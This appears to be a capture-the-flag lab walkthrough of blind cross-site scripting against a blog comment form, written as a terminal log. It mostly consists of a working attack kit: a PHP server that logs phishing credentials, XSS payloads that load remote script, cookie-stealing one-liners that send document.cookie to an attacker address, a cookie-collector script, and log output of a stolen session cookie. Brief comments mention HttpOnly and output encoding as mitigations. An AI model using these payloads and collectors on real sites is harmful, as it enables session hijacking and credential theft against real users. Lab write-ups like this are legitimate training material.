# identify XSS-vulnerable input fields
root@oco:~$ mkdir -p /tmp/tmpserver
root@oco:~$ cd /tmp/tmpserver
root@oco:~$ nano /tmp/tmpserver/index.php # index.php is written at this step with the contents below
<?php
// Lab artifact from the XSS module (HTB-style exercise): when both 'username'
// and 'password' arrive as GET parameters, the raw values are appended to
// creds.txt in the server's working directory and the browser is redirected.
// Every hit also shows up in the PHP dev-server log with its full query
// string, so the same request is equally visible in a proxy or IDS log.
if (isset($_GET['username']) && isset($_GET['password'])) {
$file = fopen("creds.txt", "a+"); // append mode; the file is created on first use
fputs($file, "Username: {$_GET['username']} | Password: {$_GET['password']}\n"); // values are written unescaped
header("Location: http://10.10.15.203:8080/phishing/index.php"); // sends the browser to /phishing/index.php on this same listener -- presumably the lookalike login page; confirm
fclose($file);
exit(); // nothing else is served for this request
}
?>
root@oco:~$ sudo php -S 0.0.0.0:8080
PHP 7.4.15 Development Server (http://0.0.0.0:8080) started
#XSS payload options
<script src=http://10.10.15.203:8080>fieldName</script>
'><script src=http://10.10.15.203:8080>fieldName</script>
"><script src=http://10.10.15.203:8080>fieldName</script>
javascript:eval('var a=document.createElement(\'script\');a.src=\'http://OUR_IP\';document.body.appendChild(a)')
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//OUR_IP");a.send();</script>
<script>$.getScript("http://OUR_IP")</script>
root@oco:~$ BROWSER > http://10.129.1.33/assessment/index.php > Recent Posts > Welcome to Security Blog
input field - comment: <script src=http://10.10.15.203:8080>comment</script>
input field - name: <script src=http://10.10.15.203:8080>name</script>
input field - email: <script src=http://10.10.15.203:8080>email</script>
input field - website <script src=http://10.10.15.203:8080>website</script> <-- vulnerable field
Post Comment...
* the payload whose field name reaches the attacking server identifies
the vulnerable field
#cookie stealing payloads
document.location='http://OUR_IP/index.php?c='+document.cookie;
new Image().src='http://OUR_IP/index.php?c='+document.cookie;
* the second payload (new Image()...) is preferred because it only adds an image to the page, which looks less suspicious
#server setup
root@oco:~$ mkdir -p /tmp/tmpserver
root@oco:~$ cd /tmp/tmpserver
root@oco:~$ nano /tmp/tmpserver/index.php # index.php is written at this step with the contents below
<?php
// Cookie collector for the cookie-stealing step: the injected script sends
// document.cookie as the 'c' query parameter; each ';'-separated entry is
// URL-decoded and appended to cookies.txt together with the requesting IP.
// document.cookie never exposes cookies carrying the HttpOnly flag, which is
// why that flag (plus output encoding of the comment fields) is the primary
// mitigation against this kind of exfiltration.
if (isset($_GET['c'])) {
$list = explode(";", $_GET['c']); // split the document.cookie string on ';'
foreach ($list as $key => $value) { // $key is unused; only the cookie text matters
$cookie = urldecode($value); // undoes the %20 encoding visible in the request log
$file = fopen("cookies.txt", "a+"); // reopened per cookie in append mode
fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n"); // REMOTE_ADDR is the peer that made the request, i.e. the browser that ran the script
fclose($file);
}
}
?>
root@oco:~$ sudo php -S 0.0.0.0:8080
PHP 7.4.15 Development Server (http://0.0.0.0:8080) started
#payload setup
root@oco:~$ sudo nano script.js
new Image().src='http://10.10.15.203:8080/index.php?c='+document.cookie;
root@oco:~$ ls
index.php script.js
#exploit
root@oco~:$ BROWSER > http://10.129.1.33/assessment/index.php > Recent Posts > Welcome to Security Blog
comment field: N/A
name field: null
email field: [email protected]
website field: <script src=http://10.10.15.203:8080>script.js</script>
Post Comment...
[Tue Nov 5 21:02:26 2024] 10.129.1.33:37570 [200]: GET /index.php?c=wordpress_test_cookie=WP%20Cookie%20check;%20wp-settings-time-2=1730862185;%20flag=HTB{cr055_5173_5cr1p71n6_n1nj4}
[Tue Nov 5 21:02:26 2024] 10.129.1.33:37570 Closing
root@oco:~$ cat cookies.txt
Victim IP: 10.129.1.33 | Cookie: wordpress_test_cookie=WP Cookie check
Victim IP: 10.129.1.33 | Cookie: wp-settings-time-2=1730862185
Victim IP: 10.129.1.33 | Cookie: flag=HTB{cr055_5173_5cr1p71n6_n1nj4}